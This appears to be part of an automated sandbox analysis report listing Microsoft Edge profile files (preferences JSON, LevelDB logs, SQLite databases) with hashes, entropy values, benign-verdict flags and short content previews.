                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380906601312016","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380906601312016","location":5,"ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):13764
                                                                                                                                                                                    Entropy (8bit):5.23556480055219
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjgjqvcREb1gYWs8/pj+FDlQA04b1f:sVgLAJu6JFjSqEAgpUJQNI
                                                                                                                                                                                    MD5:F977EE37A441DAD78A4BF456ECD1F2EC
                                                                                                                                                                                    SHA1:3ADA7BF1F0267B5F0EE8A42CD092DEE233BF18A0
                                                                                                                                                                                    SHA-256:8DD624F721BDE67FC12C069C4E506D370E7B456F17485AC72ECFDE17261A6DD3
                                                                                                                                                                                    SHA-512:16C660739B4BE95AE1F47FFE3F523B0719A92C0A92C9FB9F81DA727B99AE6CCBA9C8350153F2373892209E953AE0CEA761E155ED613558132DB99D1B9FD9FE79
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34462
                                                                                                                                                                                    Entropy (8bit):5.5582325612779835
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zmjON5WPkSfvg8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuV10Prwd1yrDdKpMtuZ:zmjON5WPkSfvgu1javb08d1yFltG
                                                                                                                                                                                    MD5:178DD4A7D6CEC8F33DA188793481D250
                                                                                                                                                                                    SHA1:015B4335C412171006D7A14C3F9E9B44A63DFDBA
                                                                                                                                                                                    SHA-256:80C91E0D021BD213879FA247402FC0D0CB071979FF20D505FDD6B9981065B0D5
                                                                                                                                                                                    SHA-512:167113CE9F604CC6BB67032D8601239AEDB8AC1DC026E0D2CB7CF79A085F8D7561D09BF8D07030233470A1A35F12E84BF4483564A24413D3515E9A227D3F0A96
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380906601312016","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380906601312016","location":5,"ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:modified
                                                                                                                                                                                    Size (bytes):1695826
                                                                                                                                                                                    Entropy (8bit):5.041145235109602
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:DPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:DPfZ/mS5
                                                                                                                                                                                    MD5:E161AC38D33435115C33CE91AC3EDB57
                                                                                                                                                                                    SHA1:C8850C5F8D648F533A31C39287C8F4BBCDB6A5AB
                                                                                                                                                                                    SHA-256:4350031AAF9A3DC833345ADB542D81B9D993AF2570785C1FBD37078E0103DD6A
                                                                                                                                                                                    SHA-512:058483867639504218FB22096B155DDE8BAC9171C51495E18EEF9A3F224BFA26903F6C0C9D06C1502435FD8AE4DAA4F8AEDBF5EB5CE1F652BB45A0CFA02DC3BB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...m.................DB_VERSION.1..l..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380906606477250.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].....................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380906607172856.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):293
                                                                                                                                                                                    Entropy (8bit):5.066841607328808
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOr1T1wkn23oH+Tcwt9Eh1ZB2KLl5ox9+q2Pwkn23oH+Tcwt9Eh1tIFUv:7cfYeb9Eh1ZFLAx9+vYfYeb9Eh16FUv
                                                                                                                                                                                    MD5:59A2D7D9BB4349F084D84C0AFF3E5CB9
                                                                                                                                                                                    SHA1:E0D627D6736FA3E3D7E5CB8694B9BDB4C12AE11F
                                                                                                                                                                                    SHA-256:FC1AB095457A2E3FFC10B0AC203913DE20417AD41780DD2D07F3DF60136CD8D0
                                                                                                                                                                                    SHA-512:C50B85C773FBD7B0720269767D556A846E8B928E293A7BEB41B3C9B6434CC7D786DC527F2AAE283D1EFCD95FC6A5E3D6E071AAF9E3A2CD1CB368D8E9895CDFF7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:05.429 1d0c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/01/09-09:30:05.565 1d0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12288
                                                                                                                                                                                    Entropy (8bit):0.3202460253800455
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                    MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                    SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                    SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                    SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                    Entropy (8bit):0.4709763545097881
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfXn57Az:TouQq3qh7z3bY2LNW9WMcUvp7A
                                                                                                                                                                                    MD5:BCB02E9459CDC58418290DA15B300467
                                                                                                                                                                                    SHA1:D32CC9AD99A69CBB1C2FC4C0215CA2AF3343654F
                                                                                                                                                                                    SHA-256:83712476D421A60542267437D7BB5533125E6FF0BF4E9C31075C2690C8E2B919
                                                                                                                                                                                    SHA-512:8F3D9A14B36F0658F59FDFC0E90C2D6EF5A1CC793A56ACD1945FE584F8F44B67D560E89FADB7A0B632A014346AD20712E35F13C846CDA34B22B1837B186DD276
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.01057775872642915
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsFl:/F
                                                                                                                                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                    Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.011852361981932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                    Entropy (8bit):0.012340643231932763
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):262512
                                                                                                                                                                                    Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:LsNlKc:Ls3Kc
                                                                                                                                                                                    MD5:6A17A0D23DC89CCC51E4A8C1AE588513
                                                                                                                                                                                    SHA1:7331A7EFBF260B4BFDD33DB7A93494F728DEE8E1
                                                                                                                                                                                    SHA-256:FD5311D85CD81EF5A1CEF2FB7C909627743C1AFF10832C97FDA61A51F3794288
                                                                                                                                                                                    SHA-512:7AF73A92AC0C18A4FC58D8B0BA5EAD322F31906A19FBFE295AC0643817D70B845ABFE934B857B084829A4E9455659C9039547D5E155A8C17A1DD49022478AD28
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.........................................N.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):305
                                                                                                                                                                                    Entropy (8bit):5.176887999713587
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:iOrZQTKXs1wkn23oH+TcwtnG2tbB2KLl5ZM/q2Pwkn23oH+TcwtnG2tMsIFUv:7TLfYebn9VFLgvYfYebn9GFUv
                                                                                                                                                                                    MD5:E045BB6EE44F97BCB900F79D5561FD82
                                                                                                                                                                                    SHA1:3185D7F26B6A0AA02BDD122DEFDB9D0957926473
                                                                                                                                                                                    SHA-256:0C4DE7B9E32FCCDE5ADF1785F4609DF61FE657B35C7F09B8C59CEF839297115F
                                                                                                                                                                                    SHA-512:B0DC027038FFF519D8E778CC974CB3A36CEEEE4ADBE25AD71C7F57BA810EEF7DB62A7053F1D4D92DB72F612F7E4C425BA4F8E5D0B3F6F8E0A90EF78595EAA694
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:2025/01/09-09:30:01.356 1b30 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/09-09:30:01.382 1b30 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                    Entropy (8bit):0.494709561094235
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                    MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                    SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                    SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                    SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                    Entropy (8bit):0.612926492966001
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jymqQDpzQemL:Te8D4jJ/6Up+hqQxQ
                                                                                                                                                                                    MD5:735E8B5E24EAF5414D619D002C045D66
                                                                                                                                                                                    SHA1:05BE3AE14B6D691B8928F81414B5B91087CBB9EC
                                                                                                                                                                                    SHA-256:685A459DF2A37E89FDE4B1823E651BD9D0D1B6382DD49E9F42B34F1DA0C8198E
                                                                                                                                                                                    SHA-512:60A14D29E14E3B88C40B3C2A0A08B21FBFCBE3F7B4F818D27873F9C7561D77C513477D135C9F5491FFFE25CB390D1765588BFEABA6210EECEBC2BD1B16A8CF2C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
